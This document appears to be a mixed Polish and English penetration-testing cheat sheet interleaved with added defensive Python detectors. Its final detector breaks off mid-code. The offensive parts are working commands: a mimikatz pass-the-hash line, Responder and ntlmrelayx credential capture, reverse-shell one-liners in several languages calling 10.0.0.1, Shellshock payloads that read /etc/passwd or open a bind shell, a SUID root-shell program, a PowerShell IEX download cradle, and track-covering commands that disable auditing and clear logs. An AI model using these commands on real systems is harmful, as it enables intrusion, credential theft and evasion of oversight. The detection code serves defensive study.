`sekurlsa::pth /user:Administrator /domain:MSEDGEWIN10 /ntlm:fc525c9683e8fe067095ba2ddc971889 /run:"powershell -w hidden"`

## 4.5 LLMNR Poisoning

### Info

An LLMNR & NBT-NS spoofing attack is a classic internal network attack that still works today, because awareness is low and both protocols are enabled by default in Windows.

#### What is LLMNR & NetBIOS Name Service broadcast?

When a DNS name server request fails, Microsoft Windows systems use Link-Local Multicast Name Resolution (LLMNR for short) and the NetBIOS Name Service (NBT-NS) as fallback name resolution.

#### What's the issue with LLMNR & NetBIOS NS broadcasting?

If the DNS name does not resolve, the client performs an unauthenticated UDP broadcast to the network asking whether any other system has the name it is looking for. Because this process is unauthenticated and broadcast to the whole network, any machine on the network can respond and claim to be the target machine.
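The defender's counterpart to the broadcast problem described above, as an added example that is not part of the original notes: because no legitimate host can answer a query for a name that does not exist, a client (or a dedicated sensor) can periodically ask LLMNR for a canary name and treat any response as a poisoner. LLMNR uses the DNS wire format on UDP/5355, so the script below is a minimal DNS message parser plus the two detection rules (answer to a canary name; answer that contradicts a known host mapping). The packets are constructed with the `build_response()` helper, and the names, addresses and the `CANARY_NAMES` set are invented for the example.

```python
"""Detect LLMNR poisoning from captured responses on UDP/5355.

Added example, not from the original notes. LLMNR uses the DNS wire format, so the
parser below is a minimal DNS message decoder. Detection rule: a *response* for a
canary name (a hostname the defender queries on purpose and that no real host has)
can only come from a spoofer, and an answer that contradicts a known host mapping
is equally suspicious. All packets are constructed with build_response(); the
names, addresses and CANARY_NAMES are invented for the example.
"""
import ipaddress
import struct

# Hostnames that do not exist on the network; a client or sensor queries them
# periodically. Nobody legitimate can answer, so any answer is a poisoner.
CANARY_NAMES = {"fileserver-canary", "wpad-test"}


def encode_name(name):
    """Encode 'a.b' as DNS labels: \\x01a\\x01b\\x00."""
    out = b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split("."))
    return out + b"\x00"


def decode_name(data, offset):
    """Decode a DNS-style name at offset, following compression pointers.

    Returns (name, offset_after_name); after a pointer the offset continues right
    behind the 2-byte pointer, not behind the labels it points to.
    """
    labels, end, hops = [], None, 0
    while True:
        length = data[offset]
        if length & 0xC0 == 0xC0:                       # 11xxxxxx: compression pointer
            if end is None:
                end = offset + 2
            offset = struct.unpack("!H", data[offset:offset + 2])[0] & 0x3FFF
            hops += 1
            if hops > 16:
                raise ValueError("compression pointer loop")
            continue
        offset += 1
        if length == 0:
            break
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), end if end is not None else offset


def build_response(txid, name, ip):
    """Construct an LLMNR A-record response for `name` pointing at `ip` (test data only)."""
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)       # QR=1, 1 question, 1 answer
    question = encode_name(name) + struct.pack("!HH", 1, 1)         # QTYPE=A, QCLASS=IN
    answer = b"\xc0\x0c"                                            # pointer to the question name
    answer += struct.pack("!HHIH", 1, 1, 30, 4) + ipaddress.IPv4Address(ip).packed
    return header + question + answer


def parse_llmnr(data):
    """Parse the header, question and answer sections of an LLMNR message."""
    txid, flags, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", data[:12])
    offset = 12
    questions = []
    for _ in range(qdcount):
        name, offset = decode_name(data, offset)
        qtype, _qclass = struct.unpack("!HH", data[offset:offset + 4])
        offset += 4
        questions.append((name, qtype))
    answers = []
    for _ in range(ancount):
        name, offset = decode_name(data, offset)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", data[offset:offset + 10])
        offset += 10
        rdata = data[offset:offset + rdlen]
        offset += rdlen
        if rtype == 1 and rdlen == 4:                                 # A record
            rdata = str(ipaddress.IPv4Address(rdata))
        answers.append((name, rtype, rdata))
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "questions": questions, "answers": answers}


def detect_poisoning(packets, known_hosts):
    """packets: iterable of (source_ip, udp_payload). known_hosts: {name: ip} you trust.

    Returns a list of (source_ip, name, reason) alerts.
    """
    alerts = []
    for src_ip, payload in packets:
        msg = parse_llmnr(payload)
        if not msg["is_response"]:
            continue                                # queries are normal broadcast traffic
        for name, rtype, rdata in msg["answers"]:
            if rtype != 1:
                continue
            lname = name.lower()
            if lname in CANARY_NAMES:
                alerts.append((src_ip, lname, "answered a canary name that no host owns"))
            elif lname in known_hosts and rdata != known_hosts[lname]:
                alerts.append((src_ip, lname, f"answer {rdata} contradicts known {known_hosts[lname]}"))
    return alerts


if __name__ == "__main__":
    # Constructed traffic: 10.0.0.77 plays the poisoner, 10.0.0.5 is the real print server
    sample = [
        ("10.0.0.77", build_response(0x1234, "fileserver-canary", "10.0.0.77")),
        ("10.0.0.5", build_response(0x1235, "printsrv", "10.0.0.5")),
        ("10.0.0.77", build_response(0x1236, "printsrv", "10.0.0.77")),
    ]
    for alert in detect_poisoning(sample, {"printsrv": "10.0.0.5"}):
        print(alert)
```

In production the payloads come from a capture of UDP port 5355 (and the same parser works for NBT-NS answers on UDP/137 after adjusting the name encoding); the alert source IP is the host to investigate. Disabling LLMNR and NBT-NS via Group Policy removes the broadcast fallback altogether, which is the mitigation the attack description above implies.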
#### What is an LLMNR / NBT-NS Poisoning Attack?

By listening for LLMNR & NetBIOS broadcasts it is possible to masquerade as (spoof) the machine the client is erroneously trying to authenticate with. After accepting the connection it is possible to use a tool like Responder.py or Metasploit to forward the requests to a rogue service (like SMB TCP: 137) that performs the authentication process. During the authentication process the client sends the rogue server an NTLMv2 hash for the user that is trying to authenticate; this hash is captured to disk and can be cracked offline with a tool like Hashcat or John the Ripper (JTR), or used in a pass-the-hash attack. LLMNR and NBT-NS are enabled by default in Windows, and with awareness of this attack being fairly low you stand a good chance of gathering credentials on an internal penetration test. Leave Responder.py running during an engagement while you work on other attack vectors.

### Responder

`# responder -I eth0 -rdw -v`

## 4.6 Pass the Password/Pass the Hash

`# crackmapexec`

## 4.7 Token Impersonation

```
meterpreter > load incognito
meterpreter > list_tokens
meterpreter > impersonate_token <user>
```

## 4.8 SMB Relay

#### Requirements

* SMB signing must be disabled on the target
* The relayed user's credentials must be admin on the machine

#### Attack

1. Disable `HTTP Server` and `SMB Server` in Responder.conf
2. `# responder -I eth0 -rdw -v`
3. In parallel, run [ntlmrelayx](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) `python ntlmrelayx.py -tf targets.txt -smb2support`

## 4.9 Kerberoasting

![](https://i.imgur.com/0FmvbO9.png)

### Intro

User logs on with username & password.

- 1a. Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC as an authenticator in the authentication ticket (TGT) request (AS-REQ).
- 1b. The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc.) & creates a Ticket-Granting Ticket (TGT).
- 2. The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data.
- 3. The user presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates the PAC checksum; if the DC can open the ticket & the checksum checks out, TGT = valid. The data in the TGT is effectively copied to create the TGS ticket.
- 4. The TGS is encrypted using the target service account's NTLM password hash and sent to the user (TGS-REP).
- 5. The user connects to the server hosting the service on the appropriate port & presents the TGS (AP-REQ). The service opens the TGS ticket using its NTLM password hash.
- 6. If mutual authentication is required by the client (think MS15-011: the Group Policy patch from February that added UNC hardening). Unless PAC validation is required (rare), the service accepts all data in the TGS ticket with no communication to the DC.

### GetUserSPNs

`python GetUserSPNs.py MARVEL.local/fcastle:Password1 -dc-ip <ip> -request`

# 5. Maintaining access

## 5.1 Reverse Shells

### Bash

`bash -i >& /dev/tcp/10.0.0.1/8080 0>&1`

### PERL

`perl -e 'use Socket;$i="192.168.1.102";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`

### Python

`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`

### PHP

`php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'`

### Ruby

`ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'`

### Netcat

`nc -e /bin/sh 10.0.0.1 1234`

If you have the wrong version of netcat installed, you might still be able to get your reverse shell back like this:

`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f`

## 5.2 Bind Shells

`nc -lvp 4444 -e /bin/sh`

## 5.3 Other

#### Spawn Shell

When we only have /bin/sh, these commands spawn bash:

- Python
  `python -c 'import pty; pty.spawn("/bin/bash")'`
  `python3 -c 'import pty; pty.spawn("/bin/bash")'`
- `echo os.system('/bin/bash')`
- `/bin/sh -i`
- `perl -e 'exec "/bin/sh";'`
- `perl: exec "/bin/sh";`
- `ruby: exec "/bin/sh"`
- `lua: os.execute('/bin/sh')`
- (From within IRB) `exec "/bin/sh"`
- (From within vi) `:!bash`
- (From within vi) `:set shell=/bin/bash:shell`
- (From within nmap) `!sh`

#### stty raw

When we have a shell but `tab` completion does not work, nor do `vim` or `nano`:

1. `CTRL-Z`
2. `stty raw -echo`
3. `fg`

# 6. Covering tracks

## 6.1 Linux

On Linux, logs are kept in the `/var/log` directory. A good approach is to change the `$HISTSIZE` variable, which determines the size of the bash history file.
You can view it with `# echo $HISTSIZE` and set it to 0: `# export HISTSIZE=0`

From that point on nothing is written to `~/.bash_history`.

:::info
Best done right after the break-in, restoring the default value afterwards.
:::

## 6.2 Windows

### 6.2.1 Auditpol

`auditpol /disable`

### 6.2.2 Meterpreter

`meterpreter > clearev`

# 7. Web

### HTTP Codes

| Code | Description | Meaning |
| -------- | -------- | -------- |
| 200 | OK | Content of the requested document |
| 301 | Moved perm. | The resource has changed its URI |
| 302 | Found | Temporarily available at another address |
| 400 | Bad Request | Malformed request, e.g. a syntax error |
| 401 | Unauthorized | Request for a resource that requires authentication |
| 403 | Forbidden | The server understood the request, but its security configuration forbids returning the resource |
| 404 | Not Found | The server found no resource at the given URL, nor anything indicating such a resource existed in the past |

## SQLi

### sqlmap

```
--dbs                Enumerate DBMS databases
-u URL, --url=URL    Target URL (e.g. "http://www.site.com/vuln.php?id=1")
```

`# sqlmap -u <link> --dbs`

`# sqlmap -u <link> -D <Database>`

`# sqlmap -u <link> -D <Database> -T <table> --dump`

# 8. Linux

## 8.1 Linux permissions

| R | W | X | Octal |
|---|---|---|---|
| 0 | 0 | 0 | 0 |
| 0 | 0 | 1 | 1 |
| 0 | 1 | 0 | 2 |
| 0 | 1 | 1 | 3 |
| 1 | 0 | 0 | 4 |
| 1 | 0 | 1 | 5 |
| 1 | 1 | 0 | 6 |
| 1 | 1 | 1 | 7 |

### chmod

* `chmod [u,g,o]+[r,w,x] <file.sh>`
  - `u` - user
  - `g` - group
  - `o` - other

e.g. `chmod u+x file.sh` - execute permission for the owning user

## 8.2 SUID

![SUID](https://i.imgur.com/XPCmwPQ.jpg)

#### Setting SUID with chmod

- `chmod u+s file.txt`
- `chmod 4750 file.txt`

### Finding all files with SUID set

`find / -perm -4000 2>/dev/null`

:::info
A capital `S` in the permissions means the file does not have the execute bit, e.g.:

- SUID without execute permission
```
chmod u+s file1.txt
ls -l
-rwSrwxr-x 1 surendra surendra 0 Dec 27 11:24 file1.txt
```

- SUID with execute permission
```
chmod u+x file1.txt
ls -l
-rwsrwxr-x 1 surendra surendra 0 Dec 5 11:24 file1.txt
```
:::

## 8.3 iptables

#### Commands

- `-L _chain_` lists the rules in the chain. This is commonly used with the `-n` option to disable name resolution (for example, `iptables -n -L INPUT` will display the rules related to incoming packets).
- `-N _chain_` creates a new chain. You can create new chains for a number of purposes, including testing a new network service or fending off a network attack.
- `-X _chain_` deletes an empty and unused chain (for example, `iptables -X ddos-attack`).
- `-A _chain_ _rule_` adds a rule at the end of the given chain. Remember that rules are processed from top to bottom, so keep this in mind when adding rules.
- `-I _chain_ _rule_num_ _rule_` inserts a rule before the rule number _rule_num_. As with the `-A` option, keep the processing order in mind when inserting new rules into a chain.
- `-D _chain_ _rule_num_` (or `-D _chain_ _rule_`) deletes a rule in a chain; the first syntax identifies the rule to be deleted by its number (`iptables -L --line-numbers` will display these numbers), while the latter identifies it by its contents.
- `-F _chain_` flushes a chain (deletes all its rules). For example, to delete all of the rules related to outgoing packets, you would run `iptables -F OUTPUT`. If no chain is mentioned, all the rules in the table are deleted.
- `-P _chain_ _action_` defines the default action, or "policy", for a given chain; note that only standard chains can have such a policy. To drop all incoming traffic by default, you would run `iptables -P INPUT DROP`.

#### Example 1

```
# iptables -A INPUT -s 10.0.1.5 -j DROP
# iptables -A INPUT -s 31.13.74.0/24 -j DROP
# iptables -n -L INPUT
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
DROP       all  --  10.0.1.5             0.0.0.0/0
DROP       all  --  31.13.74.0/24        0.0.0.0/0
```

#### Example 2

```
# iptables -A INPUT -m state --state NEW -p tcp --dport 22 -j ACCEPT
# iptables -A INPUT -m state --state NEW -p tcp --dport 80 -j ACCEPT
# iptables -A INPUT -m state --state NEW -p tcp --dport 143 -j ACCEPT
# iptables -n -L INPUT
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
DROP       all  --  10.0.1.5             0.0.0.0/0
DROP       all  --  31.13.74.0/24        0.0.0.0/0
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            state NEW tcp dpt:22
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            state NEW tcp dpt:80
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            state NEW tcp dpt:143
```

## 8.4 Shellshock

#### Exploiting Shellshock

A tool to find and exploit servers vulnerable to Shellshock:

```
git clone https://github.com/nccgroup/shocker
```

```
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
```

##### cat file (view file contents)

```
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
```

##### Shellshock run bind shell

```
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
```

##### Shellshock reverse shell

```
nc -l -p 443
```

##### HTTP Header

- `curl -H "User-Agent: () { :; }; /bin/uname -a" http://<ip>`
- `Content-type: () { :;}; echo; /bin/uname`

## 8.5 tcpdump

[More](https://danielmiessler.com/study/tcpdump/)

Options

```
-i any : Listen on all interfaces just to see if you're seeing any traffic.
-i eth0 : Listen on the eth0 interface.
-D : Show the list of available interfaces
-l : Line-readable output (for viewing as you save, or sending to other commands)
-A : Display output in ASCII.
-n : Don't resolve hostnames.
-nn : Don't resolve hostnames or port names.
-q : Be less verbose (more quiet) with your output.
-t : Give human-readable timestamp output.
-tttt : Give maximally human-readable timestamp output.
-X : Show the packet's contents in both hex and ASCII.
-XX : Same as -X, but also shows the ethernet header.
-v, -vv, -vvv : Increase the amount of packet information you get back.
-c : Only get x number of packets and then stop.
-s : Define the snaplength (size) of the capture in bytes. Use -s0 to get everything, unless you are intentionally capturing less.
-S : Print absolute sequence numbers.
-e : Get the ethernet header as well.
-q : Show less protocol information.
-E : Decrypt IPSEC traffic by providing an encryption key.
```

## 8.6 rootbash - bash with elevated privileges

```clike=
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setgid(0);            /* switch to the root group */
    setuid(0);            /* switch to uid 0; only succeeds when the binary is SUID root */
    system("/bin/bash");  /* start an interactive shell with those ids */
    return 0;
}
```

Compilation

```
gcc -o rootbash rootbash.c
```

:::info
The program starts /bin/bash with setgid/setuid set to 0, i.e. root :)
:::

# 9. Windows

## 9.1 PowerShell

`dir | Get-Member`

#### 9.1.1 Comparison operators

```
-eq
-ne
-gt
-lt
-ceq
-like
-match
-cmatch
```

#### 9.1.2 Aliases

`Get-Alias ls`

`Set-Alias`

#### 9.1.3 Help

`help <cmd>`

`help <cmd> -online`

#### 9.1.4 Sorting

`Get-ChildItem | Sort-Object -Property length -desc`

#### 9.1.5 Filtering

`where, ?`

`dir | Where-Object {($_.length -gt 50000) -and ($_.Name -like "B*")}`

#### 9.1.6 Foreach loop

`1..10 | ForEach-Object {$_*2}`

#### 9.1.7 Arrays

`$strComputers = @("Srv1","Srv2","Srv3")`

#### 9.1.8 Hash tables

`$empNumbers = @{"John Doe" = 112233;"Adam Kowalski" = 223344;}`

`$empNumbers["John Doe"] = 334455`

`$empNumbers.Remove("John Doe")`

#### 9.1.9 Output formatting

`$files | Format-Wide -Property length`

`$files | Format-List -Property name,length,lastwritetime`

`Get-Process | Format-Table -Property path,name -GroupBy company`

`Get-Process | Sort-Object -Property company | Format-Table -Property path,name -GroupBy company`

`$names | Sort-Object -property pcthispanic -Descending | Select-Object -First 1`

#### 9.1.10 Saving output

`Get-Process | Out-File C:\temp\process.txt`

`Get-Process | ConvertTo-Html | Out-File C:\temp\process.txt`

#### 9.1.11 Importing data

`$proc = Import-Csv .\proc.csv`

#### 9.1.12 Scripts

```powershell=
function Add-Numbers {
    param([int]$num1, [int]$num2)
    return $num1 + $num2
}

$result = Add-Numbers 1 2
$result += Add-Numbers 2 3
$result
```

```powershell=
function Get-DirInfo($dir) {
    $results = Get-ChildItem $dir -Recurse | Measure-Object -Property length -Sum
    return [math]::Round(($results).sum/1MB,3)
}

Get-DirInfo C:\temp
```

```powershell=
#parameters
param([string]$dirg="C:\")

#Functions
function Get-DirInfo($dir) {
    $results = Get-ChildItem $dir -Recurse | Measure-Object -Property length -Sum
    return [math]::Round(($results).sum/1MB,3)
}

#main
Get-DirInfo $dirg
```

```powershell=
#Parameters
#The script should take 2 arguments $source and $destination (for the source and destination folders).
param([string]$source="c:\temp\source",[string]$destination="c:\temp\destination") #Functions #2) Functions #Create a function named CheckFolder that checks for the existence of a specific directory/folder that is passed #to it as a parameter. Also, include a switch parameter named create. If the directory/folder does not exist and #the create switch is specified, a new folder should be created using the name of the folder/directory that was #passed to the function. function Check-Folder([string]$path, [switch]$create){ $exists = Test-Path $path if(!$exists -and $create){ #create the directory because it doesn't exist mkdir $path | out-null $exists = Test-Path $path } return $exists } #Create a function named DisplayFolderStatistics to display folder statistics for a directory/path that is passed #to it. Output should include the name of the folder, number of files in the folder, and total size of all files in #that directory. function Display-FolderStats([string]$path){ $files = dir $path -Recurse | where {!$_.PSIsContainer} $totals = $files | Measure-Object -Property length -sum $stats = "" | Select path,count,size $stats.path = $path $stats.count = $totals.count $stats.size = [math]::round($totals.sum/1MB,2) return $stats } #3) Main processing #a) Test for existence of the source folder (using the CheckFolder function). $sourceexists = Check-Folder $source if (!$sourceexists){ Write-Host "The source directory is not found. Script can not continue." Exit } #b) Test for the existence of the destination folder; create it if it is not found (using the CheckFolder function #with the –create switch).Write-Host "Testing Destination Directory - $destination" $destinationexists = Check-Folder $destination -create if (!$destinationexists){ Write-Host "The destination directory is not found. Script can not continue." Exit } #c) Copy each file to the appropriate destination. 
#get all the files that need to be copied $files = dir $source -Recurse | where {!$_.PSIsContainer} #c-i) Display a message when copying a file. The message should list where the file is being #moved from and where it is being moved to. foreach ($file in $files){ $ext = $file.Extension.Replace(".","") $extdestdir = "$destination\$ext" #check to see if the folder exists, if not create it $extdestdirexists = Check-Folder $extdestdir -create if (!$extdestdirexists){ Write-Host "The destination directory ($extdestdir) can't be created." Exit } #copy file copy $file.fullname $extdestdir } #d) Display each target folder name with the file count and byte count for each folder. $dirs = dir $destination | where {$_.PSIsContainer} $allstats = @() foreach($dir in $dirs){ $allstats += Display-FolderStats $dir.FullName } $allstats | sort size -Descending ``` ## 9.2 Pass-the-Hash ## 9.3 NTFS ADS ``` > echo tresc > test.txt > more < test.txt > echo dodatkowa tresc > test.txt:dodatkowa.txt > more < test.txt:dodatkowa.txt ``` * dodawanie programów ``` > type C:\Windows\system3calc.exe > file.exe:calc.exe > start file.exe:calc.exe ``` * Można w ten sposób ukryty kod wykonać: ``` **Windows7 - uruchamianie ukrytego kodu vbs:** C:\ads>echo Wscript.Echo "uruchomiony" > test.txt:script.txt C:\ads>cscript //E:vbs test.txt:script.txt Host skryptów systemu Windows firmy Microsoft (R) wersja 5.8 Copyright (C) Microsoft Corporation 1996-2001. Wszelkie prawa zastrzeżone. uruchomiony ``` ## 9.4 SysInternals #### Live ``` \\live.sysinternals.com\tools ``` # 10. 
BufferOverflow ## Rejestry | Rejestr | Przeznaczenie | |---------|---------------| | EAX | Accumulator, używa się go do przechowywania wyników wielu operacji) | | EBX | Base Register (rejestr bazowy - służy do adresowania)| | ECX | Counter Register (rejestr licznikowy - służy jako licznik w pętli)| | EDX | Data Register (rejestr danych - umożliwia przekaz/odbiór danych z portów wejścia/wyjścia)| | ESI/EDI | Source Index (rejestr źródłowy - trzyma źródło łańcucha danych) / Destination Index (rejestr przeznaczenia - przetrzymuje informacje o miejscu docelowym łańcucha danych)| | ESP | Stack Pointer (przechowuje wskaźnik wierzchołka stosu) | | EBP | Base Pointer (rejestr bazowy - służy do adresowania)| | EIP | wskaźnik adresowy na aktualnie wykonywaną instrukcję. Za jego pomocą procesor realizuje m.in. skoki, pętle, przejścia do podprogramów | ## Przykład BO ![Buffer Overflow](https://i.imgur.com/61oprM0.png) ## 10.1 Fuzzing ### AFL `CC` - dla języka C `CXX` - dla języka C++ np. `CC=afl-gcc ./configure; make` `CXX=afl-g++ ./configure; make` Once finished, you want to tune up your configuration, the following command will instruct the system to output coredumps as files instead of sending them to a specific crash handler app. ``` # echo core > /proc/sys/kernel/core_pattern ``` ``` # mkdir in # mkdir out # afl-fuzz -i in/ -o out/ ./plik -a @@ ``` :::info W katalogu `input` znajduje się legitny plik. AFL uzywa go jako base template. ::: # 11. HTB ## Klucz `curl -X "POST" "https://www.hackthebox.eu/api/invite/generate" | jq -r .data.code | base64 --decode ` ## PowerShell IEX download ``` powershell "IEX(New-Object Net.WebClient).downloadString ('http://<ip>:<port>/exploit.html')" ``` # 12. CRYPTO * [quipqiup.com](https://quipqiup.com/) # 13. CRACK ## ZIP `$ fcrackzip -v -D -u -p /usr/share/dict/words secret.zip`
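As an added example for the iptables listings above (Example 1 and Example 2), and not part of the original note: a small Python parser for `iptables -n -L INPUT` output that flags the weakness in Example 2, where the chain policy is still ACCEPT, so the port-specific ACCEPT rules restrict nothing. The listing embedded in the block is the note's own output; the function and type names are my own.

```python
# Added example (not from the original note): audit an `iptables -n -L INPUT` listing like
# the one in Example 2. With policy ACCEPT and no final catch-all DROP, the ACCEPT rules
# for ports 22/80/143 restrict nothing: every other port is reachable as well.
# The sample listing is the note's own output, re-typed here.
import re
from collections import namedtuple

SAMPLE_LISTING = """\
Chain INPUT (policy ACCEPT)
target     prot opt source               destination
DROP       all  --  10.0.1.5             0.0.0.0/0
DROP       all  --  31.13.74.0/24        0.0.0.0/0
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            state NEW tcp dpt:22
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            state NEW tcp dpt:80
ACCEPT     tcp  --  0.0.0.0/0            0.0.0.0/0            state NEW tcp dpt:143
"""

Rule = namedtuple("Rule", "target proto source dest extra")   # extra = match text after destination
Chain = namedtuple("Chain", "name policy rules")

def parse_chain(listing: str) -> Chain:
    """Parse `iptables -n -L <chain>` output (without -v or --line-numbers)."""
    lines = [l for l in listing.splitlines() if l.strip()]
    m = re.match(r"Chain (\S+) \(policy (\S+)\)", lines[0])
    if not m:
        raise ValueError("not a built-in chain header: " + lines[0])
    chain = Chain(m.group(1), m.group(2), [])
    for line in lines[2:]:                  # lines[1] is the column header
        parts = line.split(None, 5)         # target prot opt source destination [extra]
        target, proto, _opt, src, dst = parts[:5]
        chain.rules.append(Rule(target, proto, src, dst, parts[5] if len(parts) > 5 else ""))
    return chain

def audit_input_chain(chain: Chain) -> list:
    """Return findings as strings; an empty list means the chain closes by default."""
    findings = []
    allowed = [re.search(r"dpt:(\d+)", r.extra).group(1)
               for r in chain.rules if r.target == "ACCEPT" and "dpt:" in r.extra]
    catch_all_drop = any(r.target in ("DROP", "REJECT") and r.source == "0.0.0.0/0"
                         and r.dest == "0.0.0.0/0" and not r.extra for r in chain.rules)
    if chain.policy == "ACCEPT" and not catch_all_drop:
        findings.append("policy ACCEPT and no final DROP: the ACCEPT rules for ports "
                        + ", ".join(allowed) + " restrict nothing; all other ports are open too")
    return findings
```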
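Added detection-side example for the Shellshock section (8.4), not from the original note: Python that flags the `() { :;};` header pattern in raw HTTP requests and in combined-format access logs. The request text and log lines in the block are constructed to mirror the headers in the note; the IPs are documentation addresses.

```python
# Added example (not from the original note): detection of Shellshock-style payloads
# (the "() { :;};" header values used in section 8.4) in raw HTTP requests and in
# combined-format access logs, from the defender's side. Sample request and log lines
# are constructed to mirror the note's headers; IPs are documentation addresses.
import re

# Bash only treated an environment value beginning with "() {" as a function definition,
# so every known Shellshock variant starts that way. Whitespace is tolerated.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

def is_shellshock(value: str) -> bool:
    """True if a header value carries a bash function-definition payload."""
    return SHELLSHOCK_RE.search(value) is not None

def scan_http_request(raw: str) -> list:
    """(header, value) pairs of a raw HTTP request whose value looks like Shellshock."""
    head = raw.split("\r\n\r\n", 1)[0]
    hits = []
    for line in head.split("\r\n")[1:]:     # [0] is the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        if is_shellshock(value):
            hits.append((name.strip(), value.strip()))
    return hits

COMBINED_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
                         r'\S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"')

def scan_access_log(lines) -> list:
    """(client ip, request line, field) for entries whose Referer or User-Agent matches."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue
        for field in ("ref", "ua"):
            if is_shellshock(m.group(field)):
                hits.append((m.group("ip"), m.group("req"), field))
    return hits

# Constructed samples mirroring the note's headers
SAMPLE_REQUEST = ("HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo $(</etc/passwd)\r\n"
                  "Host: vulnerable\r\nConnection: close\r\n\r\n")
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Oct/2020:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [10/Oct/2020:13:55:40 +0000] "HEAD /cgi-bin/status HTTP/1.1" 200 - "-" "() { :; }; /bin/uname -a"',
]
```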
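Added example for the NTFS ADS section (9.3), not from the original note: a Python parser for `dir /R` output that lists alternate data streams such as `test.txt:dodatkowa.txt` and `file.exe:calc.exe` and separates them from the Zone.Identifier stream that marks downloaded files. The listing in the block is constructed; the file names follow the note's examples and the sizes and dates are made up.

```python
# Added example (not from the original note): parse the output of `dir /R` (cmd.exe), which
# lists alternate data streams as "<size> <file>:<stream>:$DATA" lines, and report streams
# that could hide content, like the test.txt:dodatkowa.txt and file.exe:calc.exe examples
# in the note. The sample listing below is constructed; sizes and dates are made up.
import re

STREAM_RE = re.compile(r"^\s+(?P<size>\d[\d,]*)\s+(?P<file>.+?):(?P<stream>[^:\\/]+):\$DATA\s*$")
# Zone.Identifier is written by browsers/Explorer to mark downloaded files (mark-of-the-web);
# it is expected on many files, so it is excluded from findings rather than reported.
BENIGN_STREAMS = {"Zone.Identifier"}

def parse_dir_r(listing: str) -> list:
    """Return (file, stream, size_in_bytes) for each ADS line in `dir /R` output."""
    streams = []
    for line in listing.splitlines():
        m = STREAM_RE.match(line)
        if m:
            streams.append((m.group("file"), m.group("stream"), int(m.group("size").replace(",", ""))))
    return streams

def suspicious_streams(listing: str, min_size: int = 1) -> list:
    """ADS entries that are not the mark-of-the-web and carry at least min_size bytes."""
    return [s for s in parse_dir_r(listing) if s[1] not in BENIGN_STREAMS and s[2] >= min_size]

SAMPLE_DIR_R = """\
 Volume in drive C has no label.
 Volume Serial Number is 1234-ABCD

 Directory of C:\\ads

10/10/2020  01:55 PM    <DIR>          .
10/10/2020  01:55 PM    <DIR>          ..
10/10/2020  01:56 PM                 7 test.txt
                                    16 test.txt:dodatkowa.txt:$DATA
10/10/2020  01:57 PM                 0 file.exe
                               897,024 file.exe:calc.exe:$DATA
10/10/2020  01:58 PM            12,345 setup.exe
                                    26 setup.exe:Zone.Identifier:$DATA
               3 File(s)         12,352 bytes
               2 Dir(s)  10,000,000,000 bytes free
"""
```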
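Added example for the PowerShell IEX download one-liner in section 11, written from the detection side and not part of the original note: a Python check over process command lines that flags download cradles and, going beyond the note, decodes `-EncodedCommand` (base64 of UTF-16LE) so an encoded cradle is found as well. The command lines, host names and the 192.0.2.5:8000 address are constructed placeholders.

```python
# Added example (not from the original note): flag PowerShell download cradles such as the
# IEX(New-Object Net.WebClient).downloadString(...) one-liner from section 11 in process
# command lines (e.g. Sysmon event 1 or Security 4688). Beyond the note, -EncodedCommand
# (base64 of UTF-16LE) is decoded so the same cradle is found when hidden that way.
# Sample command lines are constructed; hosts, users and the URL are placeholders.
import base64
import re

CRADLE_PATTERNS = [                       # both must match: evaluate code AND fetch it remotely
    re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
]
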